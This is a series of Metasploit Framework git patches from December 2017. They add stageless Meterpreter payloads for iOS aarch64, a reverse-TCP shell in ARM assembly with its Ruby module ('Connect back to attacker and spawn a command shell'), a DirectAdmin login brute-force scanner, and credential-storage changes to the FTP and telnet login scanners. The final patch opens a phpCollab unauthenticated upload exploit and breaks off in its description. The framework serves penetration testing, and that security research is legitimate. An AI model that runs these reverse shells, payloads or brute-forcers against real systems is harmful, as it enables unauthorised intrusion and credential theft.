'msf/base/sessions/mettle_config' +require 'msf/base/sessions/meterpreter_aarch64_apple_ios' + +module MetasploitModule + + include Msf::Payload::Single + include Msf::Sessions::MeterpreterOptions + include Msf::Sessions::MettleConfig + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Apple_iOS Meterpreter, Reverse HTTP Inline', + 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', + 'Author' => [ + 'Adam Cammack ', + 'Brent Cook ', + 'timwr' + ], + 'Platform' => 'apple_ios', + 'Arch' => ARCH_AARCH64, + 'License' => MSF_LICENSE, + 'Handler' => Msf::Handler::ReverseHttp, + 'Session' => Msf::Sessions::Meterpreter_aarch64_Apple_iOS + ) + ) + end + + def generate + opts = { + scheme: 'http', + stageless: true + } + MetasploitPayloads::Mettle.new('aarch64-iphone-darwin', generate_config(opts)).to_binary :exec + end +end diff --git a/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_https.rb b/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_https.rb new file mode 100644 index 0000000000..01758f1e19 --- /dev/null +++ b/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_https.rb @@ -0,0 +1,44 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core/handler/reverse_https' +require 'msf/base/sessions/meterpreter_options' +require 'msf/base/sessions/mettle_config' +require 'msf/base/sessions/meterpreter_aarch64_apple_ios' + +module MetasploitModule + + include Msf::Payload::Single + include Msf::Sessions::MeterpreterOptions + include Msf::Sessions::MettleConfig + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Apple_iOS Meterpreter, Reverse HTTPS Inline', + 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', + 'Author' => [ + 'Adam Cammack ', + 'Brent Cook ', + 'timwr' + ], + 'Platform' => 'apple_ios', + 'Arch' => ARCH_AARCH64, + 'License' => MSF_LICENSE, + 'Handler' => Msf::Handler::ReverseHttps, + 'Session' => Msf::Sessions::Meterpreter_aarch64_Apple_iOS + ) + ) + end + + def generate + opts = { + scheme: 'https', + stageless: true + } + MetasploitPayloads::Mettle.new('aarch64-iphone-darwin', generate_config(opts)).to_binary :exec + end +end diff --git a/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_tcp.rb new file mode 100644 index 0000000000..a3d0a0181e --- /dev/null +++ b/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_tcp.rb @@ -0,0 +1,44 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core/handler/reverse_tcp' +require 'msf/base/sessions/meterpreter_options' +require 'msf/base/sessions/mettle_config' +require 'msf/base/sessions/meterpreter_aarch64_apple_ios' + +module MetasploitModule + + include Msf::Payload::Single + include Msf::Sessions::MeterpreterOptions + include Msf::Sessions::MettleConfig + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Apple_iOS Meterpreter, Reverse TCP Inline', + 'Description' => 'Run the Meterpreter / Mettle server payload (stageless)', + 'Author' => [ + 'Adam Cammack ', + 'Brent Cook ', + 'timwr' + ], + 'Platform' => 'apple_ios', + 'Arch' => ARCH_AARCH64, + 'License' => MSF_LICENSE, + 'Handler' => Msf::Handler::ReverseTcp, + 'Session' => Msf::Sessions::Meterpreter_aarch64_Apple_iOS + ) + ) + end + + def generate + opts = { + scheme: 'tcp', + stageless: true + } + MetasploitPayloads::Mettle.new('aarch64-iphone-darwin', generate_config(opts)).to_binary :exec + end +end diff --git a/tools/modules/generate_mettle_payloads.rb b/tools/modules/generate_mettle_payloads.rb index 3e3c627562..c9b7dddc94 100755 --- a/tools/modules/generate_mettle_payloads.rb +++ b/tools/modules/generate_mettle_payloads.rb @@ -25,6 +25,7 @@ arches = [ ['x86', 'Linux', 'i486-linux-musl'], ['zarch', 'Linux', 's390x-linux-musl'], ['x64', 'OSX', 'x86_64-apple-darwin'], + ['aarch64', 'Apple_iOS', 'aarch64-iphone-darwin'], ] arch = '' @@ -42,7 +43,7 @@ arches.each do |a, pl, pa| template = File::read(File::join(cwd, "meterpreter_reverse.erb")) renderer = ERB.new(template) - filename = File::join('modules', 'payloads', 'singles', platform, arch, "meterpreter_reverse_#{scheme}.rb") + filename = File::join('modules', 'payloads', 'singles', platform.downcase, arch, "meterpreter_reverse_#{scheme}.rb") File::write(filename, renderer.result()) end end From be4939b56a74b67ee2fc57b5e150df608727ae60 Mon Sep 17 00:00:00 2001 From: nromsdahl Date: Thu, 14 Dec 2017 08:05:57 -0600 Subject: [PATCH 14/37] Add credential data type Added credential data type so a successful ftp login stores the password in the database to be accessed later by the creds command. --- modules/auxiliary/scanner/ftp/ftp_login.rb | 1 + 1 file changed, 1 insertion(+) diff --git a/modules/auxiliary/scanner/ftp/ftp_login.rb b/modules/auxiliary/scanner/ftp/ftp_login.rb index 1aa1f1fc1b..ae2c3106fe 100644 --- a/modules/auxiliary/scanner/ftp/ftp_login.rb +++ b/modules/auxiliary/scanner/ftp/ftp_login.rb @@ -94,6 +94,7 @@ class MetasploitModule < Msf::Auxiliary workspace_id: myworkspace_id ) if result.success? + credential_data[:private_type] = :password credential_core = create_credential(credential_data) credential_data[:core] = credential_core create_credential_login(credential_data) From 384b250659cee5ec0fb99a64bab4accbd8955bdf Mon Sep 17 00:00:00 2001 From: nromsdahl Date: Thu, 14 Dec 2017 08:07:59 -0600 Subject: [PATCH 15/37] Add credential data type Added credential data type so that successful passwords are stored in the database and accessible via the creds command. --- modules/auxiliary/scanner/telnet/telnet_login.rb | 1 + 1 file changed, 1 insertion(+) diff --git a/modules/auxiliary/scanner/telnet/telnet_login.rb b/modules/auxiliary/scanner/telnet/telnet_login.rb index c57ca7e49c..82c1452813 100644 --- a/modules/auxiliary/scanner/telnet/telnet_login.rb +++ b/modules/auxiliary/scanner/telnet/telnet_login.rb @@ -85,6 +85,7 @@ class MetasploitModule < Msf::Auxiliary workspace_id: myworkspace_id ) if result.success? + credential_data[:private_type] = :password credential_core = create_credential(credential_data) credential_data[:core] = credential_core create_credential_login(credential_data) From 084dc4470d47ac1b032790ed25d8d3ca9a84d749 Mon Sep 17 00:00:00 2001 From: Pearce Barry Date: Fri, 15 Dec 2017 12:19:26 -0600 Subject: [PATCH 16/37] Ensure tab completion in HWBridge sessions works as expected. --- lib/msf/base/sessions/hwbridge.rb | 3 ++- lib/rex/post/hwbridge/ui/console/command_dispatcher/core.rb | 6 +++--- 2 files changed, 5 insertions(+), 4 deletions(-) diff --git a/lib/msf/base/sessions/hwbridge.rb b/lib/msf/base/sessions/hwbridge.rb index e04e7609ed..e6c9bc6190 100644 --- a/lib/msf/base/sessions/hwbridge.rb +++ b/lib/msf/base/sessions/hwbridge.rb @@ -1,7 +1,7 @@ # -*- coding: binary -*- require 'msf/base' - +require 'msf/base/sessions/scriptable' require 'rex/post/hwbridge' module Msf @@ -24,6 +24,7 @@ class HWBridge < Rex::Post::HWBridge::Client # This interface supports interactive commands. # include Msf::Session::Interactive + include Msf::Session::Scriptable # # Initialize the HWBridge console diff --git a/lib/rex/post/hwbridge/ui/console/command_dispatcher/core.rb b/lib/rex/post/hwbridge/ui/console/command_dispatcher/core.rb index b514a8902a..124ee8ca55 100644 --- a/lib/rex/post/hwbridge/ui/console/command_dispatcher/core.rb +++ b/lib/rex/post/hwbridge/ui/console/command_dispatcher/core.rb @@ -414,11 +414,11 @@ class Console::CommandDispatcher::Core if !words[1] || !words[1].match(/^\//) begin if msf_loaded? - tabs << tab_complete_postmods + tabs = tab_complete_postmods end [ # We can just use Meterpreters script path - ::Msf::Sessions::Meterpreter.script_base, - ::Msf::Sessions::Meterpreter.user_script_base + ::Msf::Sessions::HWBridge.script_base, + ::Msf::Sessions::HWBridge.user_script_base ].each do |dir| next unless ::File.exist? dir tabs += ::Dir.new(dir).find_all { |e| From f447fa1a12cb00f40f34c3d1b8a303957f4f8ec0 Mon Sep 17 00:00:00 2001 From: Nick Marcoccio Date: Sun, 17 Dec 2017 22:43:37 -0500 Subject: [PATCH 17/37] Added DirectAdmin Login Utillity --- .../framework/login_scanner/directadmin.rb | 119 +++++++++++++++ .../scanner/http/directadmin_login.rb | 135 ++++++++++++++++++ 2 files changed, 254 insertions(+) create mode 100644 lib/metasploit/framework/login_scanner/directadmin.rb create mode 100644 modules/auxiliary/scanner/http/directadmin_login.rb diff --git a/lib/metasploit/framework/login_scanner/directadmin.rb b/lib/metasploit/framework/login_scanner/directadmin.rb new file mode 100644 index 0000000000..f68f4305bc --- /dev/null +++ b/lib/metasploit/framework/login_scanner/directadmin.rb @@ -0,0 +1,119 @@ +require 'metasploit/framework/login_scanner/http' + +module Metasploit + module Framework + module LoginScanner + + class DirectAdmin < HTTP + + DEFAULT_PORT = 443 + PRIVATE_TYPES = [ :password ] + LOGIN_STATUS = Metasploit::Model::Login::Status # Shorter name + + + # Checks if the target is Direct Admin Web Control Panel. The login module should call this. + # + # @return [Boolean] TrueClass if target is DAWCP, otherwise FalseClass + def check_setup + login_uri = normalize_uri("#{uri}/CMD_LOGIN") + res = send_request({'uri'=> login_uri}) + + if res && res.body.include?('DirectAdmin Login') + return true + end + + false + end + + + # Returns the latest sid from Symantec Web Gateway. + # + # @return [String] The PHP Session ID for DirectAdmin Web Control login + def get_last_sid + @last_sid ||= lambda { + # We don't have a session ID. Well, let's grab one right quick from the login page. + # This should probably only happen once (initially). + login_uri = normalize_uri("#{uri}/CMD_LOGIN") + res = send_request({'uri' => login_uri}) + + return '' unless res + + cookies = res.get_cookies + @last_sid = cookies.scan(/(session=\w+);*/).flatten[0] || '' + }.call + end + + + # Actually doing the login. Called by #attempt_login + # + # @param username [String] The username to try + # @param password [String] The password to try + # @return [Hash] + # * :status [Metasploit::Model::Login::Status] + # * :proof [String] the HTTP response body + def get_login_state(username, password) + # Prep the data needed for login + sid = get_last_sid + protocol = ssl ? 'https' : 'http' + peer = "#{host}:#{port}" + login_uri = normalize_uri("#{uri}/CMD_LOGIN") + + res = send_request({ + 'uri' => login_uri, + 'method' => 'POST', + 'cookie' => sid, + 'headers' => { + 'Referer' => "#{protocol}://#{peer}/#{login_uri}" + }, + 'vars_post' => { + 'username' => username, + 'password' => password, + 'referer' => '%2F' + } + }) + + unless res + return {:status => LOGIN_STATUS::UNABLE_TO_CONNECT, :proof => res.to_s} + end + + # After login, the application should give us a new SID + cookies = res.get_cookies + sid = cookies.scan(/(session=\w+);*/).flatten[0] || '' + @last_sid = sid # Update our SID + + if res.headers['Location'].to_s.include?('/') && !sid.blank? + return {:status => LOGIN_STATUS::SUCCESSFUL, :proof => res.to_s} + end + + {:status => LOGIN_STATUS::INCORRECT, :proof => res.to_s} + end + + + # Attempts to login to DirectAdmin Web Control Panel. This is called first. + # + # @param credential [Metasploit::Framework::Credential] The credential object + # @return [Result] A Result object indicating success or failure + def attempt_login(credential) + result_opts = { + credential: credential, + status: Metasploit::Model::Login::Status::INCORRECT, + proof: nil, + host: host, + port: port, + protocol: 'tcp' + } + + begin + result_opts.merge!(get_login_state(credential.public, credential.private)) + rescue ::Rex::ConnectionError => e + # Something went wrong during login. 'e' knows what's up. + result_opts.merge!(status: LOGIN_STATUS::UNABLE_TO_CONNECT, proof: e.message) + end + + Result.new(result_opts) + end + + end + end + end +end diff --git a/modules/auxiliary/scanner/http/directadmin_login.rb b/modules/auxiliary/scanner/http/directadmin_login.rb new file mode 100644 index 0000000000..0c9e709e05 --- /dev/null +++ b/modules/auxiliary/scanner/http/directadmin_login.rb @@ -0,0 +1,135 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'metasploit/framework/login_scanner/directadmin' +require 'metasploit/framework/credential_collection' + +class MetasploitModule < Msf::Auxiliary + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::AuthBrute + include Msf::Auxiliary::Report + include Msf::Auxiliary::Scanner + + def initialize(info={}) + super(update_info(info, + 'Name' => 'DirectAdmin Web Control Panel Login Utility', + 'Description' => %q{ + This module will attempt to authenticate to a DirectAdmin Web Control Panel. + }, + 'Author' => [ '1oopho1e - Nick Marcoccio' ], + 'License' => MSF_LICENSE, + 'DefaultOptions' => + { + 'RPORT' => 2222, + 'SSL' => true, + } + )) + + register_options( + [ + OptString.new('USERNAME', [false, 'The username to specify for authentication', '']), + OptString.new('PASSWORD', [false, 'The password to specify for authentication', '']), + ]) + end + + + def scanner(ip) + @scanner ||= lambda { + cred_collection = Metasploit::Framework::CredentialCollection.new( + blank_passwords: datastore['BLANK_PASSWORDS'], + pass_file: datastore['PASS_FILE'], + password: datastore['PASSWORD'], + user_file: datastore['USER_FILE'], + userpass_file: datastore['USERPASS_FILE'], + username: datastore['USERNAME'], + user_as_pass: datastore['USER_AS_PASS'] + ) + + return Metasploit::Framework::LoginScanner::DirectAdmin.new( + configure_http_login_scanner( + host: ip, + port: datastore['RPORT'], + cred_details: cred_collection, + stop_on_success: datastore['STOP_ON_SUCCESS'], + bruteforce_speed: datastore['BRUTEFORCE_SPEED'], + connection_timeout: 5, + http_username: datastore['HttpUsername'], + http_password: datastore['HttpPassword'] + )) + }.call + end + + + def report_good_cred(ip, port, result) + service_data = { + address: ip, + port: port, + service_name: 'http', + protocol: 'tcp', + workspace_id: myworkspace_id + } + + credential_data = { + module_fullname: self.fullname, + origin_type: :service, + private_data: result.credential.private, + private_type: :password, + username: result.credential.public, + }.merge(service_data) + + login_data = { + core: create_credential(credential_data), + last_attempted_at: DateTime.now, + status: result.status, + proof: result.proof + }.merge(service_data) + + create_credential_login(login_data) + end + + + def report_bad_cred(ip, rport, result) + invalidate_login( + address: ip, + port: rport, + protocol: 'tcp', + public: result.credential.public, + private: result.credential.private, + realm_key: result.credential.realm_key, + realm_value: result.credential.realm, + status: result.status, + proof: result.proof + ) + end + + + # Attempts to login + def bruteforce(ip) + scanner(ip).scan! do |result| + case result.status + when Metasploit::Model::Login::Status::SUCCESSFUL + print_brute(:level => :good, :ip => ip, :msg => "Success: '#{result.credential}'") + report_good_cred(ip, rport, result) + when Metasploit::Model::Login::Status::UNABLE_TO_CONNECT + vprint_brute(:level => :verror, :ip => ip, :msg => result.proof) + report_bad_cred(ip, rport, result) + when Metasploit::Model::Login::Status::INCORRECT + vprint_brute(:level => :verror, :ip => ip, :msg => "Failed: '#{result.credential}'") + report_bad_cred(ip, rport, result) + end + end + end + + + # Start here + def run_host(ip) + unless scanner(ip).check_setup + print_brute(:level => :error, :ip => ip, :msg => 'Target is not DirectAdmin Web Control Panel') + return + end + + bruteforce(ip) + end +end From be2a3ca270b52f8843796aec834c4884922f1e52 Mon Sep 17 00:00:00 2001 From: Nick Marcoccio Date: Mon, 18 Dec 2017 08:18:02 -0500 Subject: [PATCH 18/37] edited sid comment --- lib/metasploit/framework/login_scanner/directadmin.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/metasploit/framework/login_scanner/directadmin.rb b/lib/metasploit/framework/login_scanner/directadmin.rb index f68f4305bc..f654676d0c 100644 --- a/lib/metasploit/framework/login_scanner/directadmin.rb +++ b/lib/metasploit/framework/login_scanner/directadmin.rb @@ -26,7 +26,7 @@ module Metasploit end - # Returns the latest sid from Symantec Web Gateway. + # Returns the latest sid from DirectAdmin Control Panel # # @return [String] The PHP Session ID for DirectAdmin Web Control login def get_last_sid From 6d565b6c3350592754398cb8240ff2be706f5d9b Mon Sep 17 00:00:00 2001 From: Nick Marcoccio Date: Mon, 18 Dec 2017 09:18:36 -0500 Subject: [PATCH 19/37] added author information --- modules/auxiliary/scanner/http/directadmin_login.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/http/directadmin_login.rb b/modules/auxiliary/scanner/http/directadmin_login.rb index 0c9e709e05..f8dd4ea9cb 100644 --- a/modules/auxiliary/scanner/http/directadmin_login.rb +++ b/modules/auxiliary/scanner/http/directadmin_login.rb @@ -18,7 +18,7 @@ class MetasploitModule < Msf::Auxiliary 'Description' => %q{ This module will attempt to authenticate to a DirectAdmin Web Control Panel. }, - 'Author' => [ '1oopho1e - Nick Marcoccio' ], + 'Author' => [ 'Nick Marcoccio "1oopho1e" remembermodems[at]gmail.com' ], 'License' => MSF_LICENSE, 'DefaultOptions' => { From 369d74cdb2afb944cb0a48c9870228a5197b812d Mon Sep 17 00:00:00 2001 From: Ryan Knell Date: Mon, 18 Dec 2017 10:34:00 -0500 Subject: [PATCH 20/37] Updating documentation Added a missing backtick --- documentation/modules/auxiliary/dos/http/ws_dos.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/documentation/modules/auxiliary/dos/http/ws_dos.md b/documentation/modules/auxiliary/dos/http/ws_dos.md index 6668f471df..49da03e26f 100644 --- a/documentation/modules/auxiliary/dos/http/ws_dos.md +++ b/documentation/modules/auxiliary/dos/http/ws_dos.md @@ -11,7 +11,7 @@ on the initial WebSocket upgrade request, the ws component will crash. 1. Start the vulnerable server using the sample server code below `node server.js` 2. Start `msfconsole` 3. `use auxiliary/dos/http/ws_dos` -4. `set RHOST +4. `set RHOST ` 5. `run` 6. The server should crash From 358aca943508357b852dabdab5f6ad46cb8faef4 Mon Sep 17 00:00:00 2001 From: Tim Date: Tue, 19 Dec 2017 15:39:29 +0800 Subject: [PATCH 21/37] apple_ios/aarch64/shell_reverse_tcp --- .../aarch64/single_reverse_tcp_shell.s | 72 ++++++++++++++ .../apple_ios/aarch64/shell_reverse_tcp.rb | 97 +++++++++++++++++++ 2 files changed, 169 insertions(+) create mode 100644 external/source/shellcode/apple_ios/aarch64/single_reverse_tcp_shell.s create mode 100644 modules/payloads/singles/apple_ios/aarch64/shell_reverse_tcp.rb diff --git a/external/source/shellcode/apple_ios/aarch64/single_reverse_tcp_shell.s b/external/source/shellcode/apple_ios/aarch64/single_reverse_tcp_shell.s new file mode 100644 index 0000000000..1166d26202 --- /dev/null +++ b/external/source/shellcode/apple_ios/aarch64/single_reverse_tcp_shell.s @@ -0,0 +1,72 @@ +.equ SYS_SOCKET, 0x61 +.equ SYS_CONNECT, 0x62 +.equ SYS_DUP2, 0x5a +.equ SYS_EXECVE, 0x3b +.equ SYS_EXIT, 0x01 + +.equ AF_INET, 0x2 +.equ SOCK_STREAM, 0x1 + +.equ STDIN, 0x0 +.equ STDOUT, 0x1 +.equ STDERR, 0x2 + +.equ IP, 0x0100007f +.equ PORT, 0x5C11 + +_start: + // sockfd = socket(AF_INET, SOCK_STREAM, 0) + mov x0, AF_INET + mov x1, SOCK_STREAM + mov x2, 0 + mov x16, SYS_SOCKET + svc 0 + mov x3, x0 + + // connect(sockfd, (struct sockaddr *)&server, sockaddr_len) + adr x1, sockaddr + mov x2, 0x10 + mov x16, SYS_CONNECT + svc 0 + cbnz w0, exit + + // dup2(sockfd, STDIN) ... + mov x0, x3 + mov x2, 0 + mov x1, STDIN + mov x16, SYS_DUP2 + svc 0 + mov x1, STDOUT + mov x16, SYS_DUP2 + svc 0 + mov x1, STDERR + mov x16, SYS_DUP2 + svc 0 + + // execve('/system/bin/sh', NULL, NULL) + adr x0, shell + mov x2, 0 + str x0, [sp, 0] + str x2, [sp, 8] + mov x1, sp + mov x16, SYS_EXECVE + svc 0 + +exit: + mov x0, 0 + mov x16, SYS_EXIT + svc 0 + +.balign 4 +sockaddr: + .short AF_INET + .short PORT + .word IP + +shell: +.word 0x00000000 +.word 0x00000000 +.word 0x00000000 +.word 0x00000000 +end: + diff --git a/modules/payloads/singles/apple_ios/aarch64/shell_reverse_tcp.rb b/modules/payloads/singles/apple_ios/aarch64/shell_reverse_tcp.rb new file mode 100644 index 0000000000..7dca1d0ee2 --- /dev/null +++ b/modules/payloads/singles/apple_ios/aarch64/shell_reverse_tcp.rb @@ -0,0 +1,97 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core/handler/reverse_tcp' +require 'msf/base/sessions/command_shell' +require 'msf/base/sessions/command_shell_options' + +module MetasploitModule + + CachedSize = 152 + + include Msf::Payload::Single + include Msf::Payload::Linux + include Msf::Sessions::CommandShellOptions + + def initialize(info = {}) + super(merge_info(info, + 'Name' => 'Apple iOS aarch64 Command Shell, Reverse TCP Inline', + 'Description' => 'Connect back to attacker and spawn a command shell', + 'License' => MSF_LICENSE, + 'Platform' => 'apple_ios', + 'Arch' => ARCH_AARCH64, + 'Handler' => Msf::Handler::ReverseTcp, + 'Session' => Msf::Sessions::CommandShellUnix, + 'Payload' => + { + 'Offsets' => + { + 'LHOST' => [ 132, 'ADDR' ], + 'LPORT' => [ 130, 'n' ], + }, + 'Payload' => + [ + # Generated from external/source/shellcode/apple_ios/aarch64/single_reverse_tcp_shell.s + 0xd2800040, # mov x0, #0x2 // #2 + 0xd2800021, # mov x1, #0x1 // #1 + 0xd2800002, # mov x2, #0x0 // #0 + 0xd2800c30, # mov x16, #0x61 // #97 + 0xd4000001, # svc #0x0 + 0xaa0003e3, # mov x3, x0 + 0x10000341, # adr x1, 80 + 0xd2800202, # mov x2, #0x10 // #16 + 0xd2800c50, # mov x16, #0x62 // #98 + 0xd4000001, # svc #0x0 + 0x35000260, # cbnz w0, 74 + 0xaa0303e0, # mov x0, x3 + 0xd2800002, # mov x2, #0x0 // #0 + 0xd2800001, # mov x1, #0x0 // #0 + 0xd2800b50, # mov x16, #0x5a // #90 + 0xd4000001, # svc #0x0 + 0xd2800021, # mov x1, #0x1 // #1 + 0xd2800b50, # mov x16, #0x5a // #90 + 0xd4000001, # svc #0x0 + 0xd2800041, # mov x1, #0x2 // #2 + 0xd2800b50, # mov x16, #0x5a // #90 + 0xd4000001, # svc #0x0 + 0x10000180, # adr x0, 88 + 0xd2800002, # mov x2, #0x0 // #0 + 0xf90003e0, # str x0, [sp] + 0xf90007e2, # str x2, [sp,#8] + 0x910003e1, # mov x1, sp + 0xd2800770, # mov x16, #0x3b // #59 + 0xd4000001, # svc #0x0 + 0xd2800000, # mov x0, #0x0 // #0 + 0xd2800030, # mov x16, #0x1 // #1 + 0xd4000001, # svc #0x0 + 0x5c110002, # .word 0x5c110002 + 0x0100007f, # .word 0x0100007f + 0x00000000, # .word 0x00000000 // shell + 0x00000000, # .word 0x00000000 + 0x00000000, # .word 0x00000000 + 0x00000000, # .word 0x00000000 + ].pack("V*") + } + )) + + # Register command execution options + register_options( + [ + OptString.new('SHELL', [ true, "The shell to execute.", "/bin/sh" ]), + ]) + end + + def generate + p = super + + sh = datastore['SHELL'] + if sh.length >= 16 + raise ArgumentError, "The specified shell must be less than 16 bytes." + end + p[136, sh.length] = sh + + p + end +end From acc6951bf3f35c91f30ed3dbfee946df19e367ce Mon Sep 17 00:00:00 2001 From: Nick Marcoccio Date: Tue, 19 Dec 2017 08:35:11 -0500 Subject: [PATCH 22/37] fixed typo --- modules/auxiliary/scanner/http/directadmin_login.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/http/directadmin_login.rb b/modules/auxiliary/scanner/http/directadmin_login.rb index f8dd4ea9cb..a5efe92039 100644 --- a/modules/auxiliary/scanner/http/directadmin_login.rb +++ b/modules/auxiliary/scanner/http/directadmin_login.rb @@ -18,7 +18,7 @@ class MetasploitModule < Msf::Auxiliary 'Description' => %q{ This module will attempt to authenticate to a DirectAdmin Web Control Panel. }, - 'Author' => [ 'Nick Marcoccio "1oopho1e" remembermodems[at]gmail.com' ], + 'Author' => [ 'Nick Marcoccio "1oopho1e" ' ], 'License' => MSF_LICENSE, 'DefaultOptions' => { From 15da7c699db5bfe5312970dac2f1ad90f9084d96 Mon Sep 17 00:00:00 2001 From: Tim Date: Fri, 20 Oct 2017 17:54:38 +0800 Subject: [PATCH 23/37] Fix #7779, fix multi/meterpreter/reverse_http with web_delivery --- lib/msf/core/payload/windows/reverse_http.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/payload/windows/reverse_http.rb b/lib/msf/core/payload/windows/reverse_http.rb index db89b7138d..976b9c4358 100644 --- a/lib/msf/core/payload/windows/reverse_http.rb +++ b/lib/msf/core/payload/windows/reverse_http.rb @@ -128,7 +128,7 @@ module Payload::Windows::ReverseHttp # Generate the URI for the initial stager # def generate_small_uri - generate_uri_uuid_mode(:init_native, 5) + generate_uri_uuid_mode(:init_native, 30) end # From a4098803b3029cbea7376d7b315f92a1072661be Mon Sep 17 00:00:00 2001 From: EgiX Date: Wed, 20 Dec 2017 13:10:42 +0100 Subject: [PATCH 24/37] Remove OSVDB reference --- modules/exploits/unix/webapp/tuleap_unserialize_exec.rb | 1 - 1 file changed, 1 deletion(-) diff --git a/modules/exploits/unix/webapp/tuleap_unserialize_exec.rb b/modules/exploits/unix/webapp/tuleap_unserialize_exec.rb index e320e173ec..3cde39df36 100644 --- a/modules/exploits/unix/webapp/tuleap_unserialize_exec.rb +++ b/modules/exploits/unix/webapp/tuleap_unserialize_exec.rb @@ -25,7 +25,6 @@ class MetasploitModule < Msf::Exploit::Remote 'References' => [ ['CVE', '2014-8791'], - ['OSVDB', '115128'], ['URL', 'http://karmainsecurity.com/KIS-2014-13'], ['URL', 'https://tuleap.net/plugins/tracker/?aid=7601'] ], From 05c6079e0d3c10a1b2a298a294df2d9276852f4d Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Wed, 20 Dec 2017 06:15:09 -0600 Subject: [PATCH 25/37] remove unused 'active_resource' accessor --- lib/msf/ui/console/driver.rb | 8 -------- 1 file changed, 8 deletions(-) diff --git a/lib/msf/ui/console/driver.rb b/lib/msf/ui/console/driver.rb index fd53c3278b..46c5caad95 100644 --- a/lib/msf/ui/console/driver.rb +++ b/lib/msf/ui/console/driver.rb @@ -313,8 +313,6 @@ class Driver < Msf::Ui::Driver return end - self.active_resource = resource_file - # Process ERB directives first print_status "Processing #{path} for ERB directives." erb = ERB.new(resource_file) @@ -362,8 +360,6 @@ class Driver < Msf::Ui::Driver run_single(line) end end - - self.active_resource = nil end # @@ -507,10 +503,6 @@ class Driver < Msf::Ui::Driver # The active session associated with the driver. # attr_accessor :active_session - # - # The active resource file being processed by the driver - # - attr_accessor :active_resource def stop framework.events.on_ui_stop() From 5ecc45a0d18f7c2fdb6798c95e6f72c9be88f380 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Wed, 20 Dec 2017 06:42:50 -0600 Subject: [PATCH 26/37] nicely handle exceptions when processing scripts, tell the user about them Let's help the user by saying what's going on. --- lib/msf/base/sessions/scriptable.rb | 12 ++++++++---- 1 file changed, 8 insertions(+), 4 deletions(-) diff --git a/lib/msf/base/sessions/scriptable.rb b/lib/msf/base/sessions/scriptable.rb index 87a44c031f..7c0b1e3798 100644 --- a/lib/msf/base/sessions/scriptable.rb +++ b/lib/msf/base/sessions/scriptable.rb @@ -164,13 +164,17 @@ module Scriptable else full_path = self.class.find_script_path(script_name) - # No path found? Weak. if full_path.nil? print_error("The specified script could not be found: #{script_name}") - return true + return + end + + begin + execute_file(full_path, args) + framework.events.on_session_script_run(self, full_path) + rescue StandardError => e + print_error("Could not execute #{script_name}: #{e.class} #{e}") end - framework.events.on_session_script_run(self, full_path) - execute_file(full_path, args) end end From 2629ec6bdbdc6d5853827fcfdade0bac1ce4143e Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Wed, 20 Dec 2017 06:43:20 -0600 Subject: [PATCH 27/37] infer whether the user supplied a Meterpreter or resource script --- lib/msf/base/sessions/meterpreter.rb | 13 ++++++++++--- 1 file changed, 10 insertions(+), 3 deletions(-) diff --git a/lib/msf/base/sessions/meterpreter.rb b/lib/msf/base/sessions/meterpreter.rb index f75c9e8d53..85aa3a4d8e 100644 --- a/lib/msf/base/sessions/meterpreter.rb +++ b/lib/msf/base/sessions/meterpreter.rb @@ -302,11 +302,18 @@ class Meterpreter < Rex::Post::Meterpreter::Client ## # :category: Msf::Session::Scriptable implementors # - # Runs the meterpreter script in the context of a script container + # Runs the Meterpreter script or resource file # def execute_file(full_path, args) - o = Rex::Script::Meterpreter.new(self, full_path) - o.run(args) + # Infer a Meterpreter script by it either having the .rb extension, or it + # containing a reference to the client object. This is for backward + # compatibility, since the API is not explicit to the user whether this + # should be a resource file or a Meterpreter script. + if File.extname(full_path) == ".rb" || File.read(full_path).match?(/\s*client\/./) + Rex::Script::Meterpreter.new(self, full_path).run(args) + else + console.load_resource(full_path) + end end From fd2a0d3057980161bb531fff22b4a940bc11c2ca Mon Sep 17 00:00:00 2001 From: Nick Marcoccio Date: Wed, 20 Dec 2017 08:22:01 -0500 Subject: [PATCH 28/37] Add phpCollab 2.5.1 exploit module --- .../unix/webapp/phpcollab_upload_exec.rb | 92 +++++++++++++++++++ 1 file changed, 92 insertions(+) create mode 100644 modules/exploits/unix/webapp/phpcollab_upload_exec.rb diff --git a/modules/exploits/unix/webapp/phpcollab_upload_exec.rb b/modules/exploits/unix/webapp/phpcollab_upload_exec.rb new file mode 100644 index 0000000000..75c7d60126 --- /dev/null +++ b/modules/exploits/unix/webapp/phpcollab_upload_exec.rb @@ -0,0 +1,92 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'phpCollab 2.5.1 Unauthenticated File Upload Vulnerability', + 'Description' => %q{ + This module exploits a file upload vulnerability in phpCollab 2.5.1 + which could be abused to allow unauthenticated users to execute arbitrary code + under the context of the web server user. + + The exploit has been tested on Ubuntu 